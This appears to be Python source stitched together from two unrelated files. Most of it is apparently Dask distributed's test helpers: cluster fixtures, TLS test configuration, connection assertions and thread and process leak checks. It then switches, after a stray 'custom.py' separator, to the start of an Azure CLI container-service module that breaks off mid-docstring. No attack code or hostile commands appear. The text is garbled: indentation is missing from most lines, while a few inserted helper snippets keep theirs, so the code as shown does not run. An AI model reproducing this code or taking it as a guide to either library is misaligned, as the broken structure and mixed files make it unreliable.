active_rpc_timeout=10,
disconnect_timeout=20,
scheduler_kwargs={},
config={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1, config),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q, config),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers],
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=30)
with suppress(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with suppress(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
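# Usage sketch (illustrative only, mirroring the cluster_fixture/client fixtures
# above): cluster() yields a scheduler descriptor plus a list of worker
# descriptors, and tests normally connect a Client to scheduler["address"].
def _example_cluster_usage():
    with cluster(nworkers=2) as (scheduler, workers):
        with Client(scheduler["address"]) as client:
            assert client.submit(inc, 1).result() == 2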
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with rpc(addr, **rpc_kwargs) as w:
# If the worker was killed hard (e.g. sigterm) during test runtime,
# we do not know at this point and may not be able to connect
with suppress(EnvironmentError, CommClosedError):
# Do not request a reply since comms will be closed by the
# worker before a reply can be made and we will always trigger
# the timeout
await w.terminate(reply=False)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*(disconnect(addr, timeout, rpc_kwargs) for addr in addresses))
def gen_test(timeout=_TEST_TIMEOUT):
"""Coroutine test
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
    assert timeout, (
        "timeout should always be set and it should be smaller than the global one from "
        "pytest-timeout"
    )
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
async def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs),
)
for i, ncore in enumerate(nthreads)
]
await asyncio.gather(*workers)
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
await asyncio.sleep(0.01)
if time() > start + 30:
await asyncio.gather(*(w.close(timeout=1) for w in workers))
await s.close(fast=True)
raise TimeoutError("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*(end_worker(w) for w in workers))
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=_TEST_TIMEOUT,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
clean_kwargs={},
allow_unclosed=False,
):
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, param):
await ... # use tornado coroutines
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, pytest_fixture_a, pytest_fixture_b):
await ... # use tornado coroutines
See also:
start
end
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
"pytest-timeout"
)
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=", stacklevel=2)
nthreads = ncores
scheduler_kwargs = merge(
{"dashboard": False, "dashboard_address": ":0"}, scheduler_kwargs
)
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 15}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
@functools.wraps(func)
def test_func(*outer_args, **kwargs):
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for _ in range(60):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster: "
f"{e.__class__.__name__}: {e}; retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
future = func(*args, *outer_args, **kwargs)
future = asyncio.wait_for(future, timeout)
result = await future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == Status.closed)
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 60:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except OSError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
# Patch the signature so pytest can inject fixtures
orig_sig = inspect.signature(func)
args = [None] * (1 + len(nthreads)) # scheduler, *workers
if client:
args.insert(0, None)
bound = orig_sig.bind_partial(*args)
test_func.__signature__ = orig_sig.replace(
parameters=[
p
for name, p in orig_sig.parameters.items()
if name not in bound.arguments
]
)
return test_func
return _
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(30)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError(f"Failed to connect to {address}")
try:
sock = socket.create_connection(address, timeout=timeout)
except OSError:
pass
else:
sock.close()
break
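# Hedged usage sketch, not part of the original module: popen() resolves
# args[0] against sys.prefix, so "dask-scheduler" and the port below are
# assumptions about what is installed and free in the environment;
# wait_for_port() then blocks until the endpoint accepts TCP connections.
def _example_popen_and_wait_for_port():
    with popen(["dask-scheduler", "--port", "18786"]) as proc:
        # Block until the scheduler's TCP port is reachable, then verify the
        # child process is still alive.
        wait_for_port(("127.0.0.1", 18786), timeout=30)
        assert proc.poll() is None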
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
if os.getenv("DISABLE_IPV6") == "1":
return False
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
return True
except OSError:
return False
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
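# Hedged example, not from the original file: a listener test typically awaits
# a combination of the assertion helpers above. The port is a placeholder for
# whatever address the server under test is bound to (all interfaces here).
async def _example_connectivity_checks(port):
    # Reachable on loopback and, for a wildcard listener, from external
    # IPv4/IPv6 addresses as well.
    await assert_can_connect("tcp://127.0.0.1:%d" % port)
    await assert_can_connect_from_everywhere_4_6(port)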
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger."""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
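# Short usage sketch (the logger name is an arbitrary assumption): records
# emitted inside the block are written to the returned StringIO instead of the
# logger's normal handlers.
def _example_captured_logger():
    with captured_logger("distributed.example") as sio:
        logging.getLogger("distributed.example").warning("something happened")
    assert "something happened" in sio.getvalue()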
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler."""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
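# Illustrative sketch: new_config_file() dumps the dict to a temporary YAML
# file and points DASK_CONFIG at it for the duration of the block; the nested
# key below is only an example value.
def _example_new_config_file():
    with new_config_file({"distributed": {"comm": {"timeouts": {"connect": "10s"}}}}):
        # While inside the block, the environment points at the temp file.
        assert "DASK_CONFIG" in os.environ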
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip(f"rlimit too low ({soft}) and can't be increased: {e}")
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
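# Hedged sketch mirroring the gen_cluster() docstring examples, but for the
# TLS variant defined above; wrapped in a factory so nothing runs at import
# time and the test name below is purely illustrative.
def _example_gen_tls_cluster():
    @gen_tls_cluster(client=True)
    async def test_tls_cluster(c, s, a, b):
        # All comms should use the tls:// transport.
        assert s.address.startswith("tls://")
    return test_tls_cluster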
@contextmanager
def save_sys_modules():
    old_modules = sys.modules.copy()
    old_path = list(sys.path)
    try:
        yield
    finally:
        # Compare against snapshots taken before the block ran, and iterate
        # over copies so we can safely mutate sys.path / sys.modules.
        sys.path[:] = [elem for elem in sys.path if elem in old_path]
        for elem in list(sys.modules):
            if elem not in old_modules:
                del sys.modules[elem]
@contextmanager
def check_thread_leak():
"""Context manager to ensure we haven't leaked any threads"""
active_threads_start = threading.enumerate()
yield
start = time()
while True:
bad_threads = [
thread
for thread in threading.enumerate()
if thread not in active_threads_start
and "Threaded" not in thread.name
and "watch message" not in thread.name
and "TCP-Executor" not in thread.name
# TODO: Make sure profile thread is cleaned up
# and remove the line below
and "Profile" not in thread.name
]
if not bad_threads:
break
else:
sleep(0.01)
if time() > start + 5:
# Raise an error with information about leaked threads
from distributed import profile
bad_thread = bad_threads[0]
call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident])
assert False, (bad_thread, call_stacks)
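# Minimal sketch: threads started inside the block must have finished by the
# time it exits, otherwise the context manager fails after roughly 5 seconds.
def _example_check_thread_leak():
    with check_thread_leak():
        t = threading.Thread(target=lambda: None)
        t.start()
        t.join()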
@contextmanager
def check_process_leak(check=True):
for proc in mp_context.active_children():
proc.terminate()
yield
if check:
for i in range(200):
if not set(mp_context.active_children()):
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
for proc in mp_context.active_children():
proc.terminate()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
Worker._initialized_clients.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status in (Status.running, Status.paused):
w.loop.add_callback(w.close)
Worker._instances.clear()
start = time()
while any(c.status != "closed" for c in Worker._initialized_clients):
sleep(0.1)
assert time() < start + 10
Worker._initialized_clients.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(
n.status == Status.closed or n.status == Status.init for n in Nanny._instances
), {n: n.status for n in Nanny._instances}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == Status.closed for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
with check_thread_leak() if threads else nullcontext():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else nullcontext():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with suppress(AttributeError):
del thread_state.on_event_loop_thread
@pytest.fixture
def cleanup():
with clean():
yield
class TaskStateMetadataPlugin(WorkerPlugin):
"""WorkPlugin to populate TaskState.metadata"""
def setup(self, worker):
self.worker = worker
def transition(self, key, start, finish, **kwargs):
ts = self.worker.tasks[key]
if start == "ready" and finish == "executing":
ts.metadata["start_time"] = time()
elif start == "executing" and finish == "memory":
ts.metadata["stop_time"] = time()
class LockedComm(TCP):
def __init__(self, comm, read_event, read_queue, write_event, write_queue):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.comm = comm
assert isinstance(comm, TCP)
def __getattr__(self, name):
return getattr(self.comm, name)
async def write(self, msg, serializers=None, on_error="message"):
if self.write_queue:
await self.write_queue.put((self.comm.peer_address, msg))
if self.write_event:
await self.write_event.wait()
return await self.comm.write(msg, serializers=serializers, on_error=on_error)
async def read(self, deserializers=None):
msg = await self.comm.read(deserializers=deserializers)
if self.read_queue:
await self.read_queue.put((self.comm.peer_address, msg))
if self.read_event:
await self.read_event.wait()
return msg
class _LockedCommPool(ConnectionPool):
"""A ConnectionPool wrapper to intercept network traffic between servers
This wrapper can be attached to a running server to intercept outgoing read or write requests in test environments.
Examples
--------
>>> w = await Worker(...)
>>> read_event = asyncio.Event()
>>> read_queue = asyncio.Queue()
>>> w.rpc = _LockedCommPool(
w.rpc,
read_event=read_event,
read_queue=read_queue,
)
# It might be necessary to remove all existing comms
# if the wrapped pool has been used before
>>> w.remove(remote_address)
>>> async def ping_pong():
return await w.rpc(remote_address).ping()
    >>> with pytest.raises(asyncio.TimeoutError):
    ...     await asyncio.wait_for(ping_pong(), 0.01)
>>> read_event.set()
>>> await ping_pong()
"""
def __init__(
self, pool, read_event=None, read_queue=None, write_event=None, write_queue=None
):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.pool = pool
def __getattr__(self, name):
return getattr(self.pool, name)
async def connect(self, *args, **kwargs):
comm = await self.pool.connect(*args, **kwargs)
return LockedComm(
comm, self.read_event, self.read_queue, self.write_event, self.write_queue
)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
import requests
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from azure.mgmt.containerservice.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.models import ContainerServiceServicePrincipalProfile
from azure.mgmt.containerservice.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.models import ManagedCluster
from azure.mgmt.containerservice.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.models import ManagedClusterAgentPoolProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
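# Illustrative only: which() returns the absolute path of an executable found
# on PATH, or None; "kubectl" is merely an assumption about what is installed.
def _example_which():
    if which('kubectl') is None:
        raise CLIError('Can not find kubectl executable in PATH')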
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
        except URLError:
            time.sleep(1)
        else:
            break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
    :param resource_group: Name of Azure container service's resource group.
    :type resource_group: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group, disable_browser, ssh_key_file=ssh_key_file)
elif str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
else:
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
    :param name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group: Name of Azure container service's resource group.
    :type resource_group: String
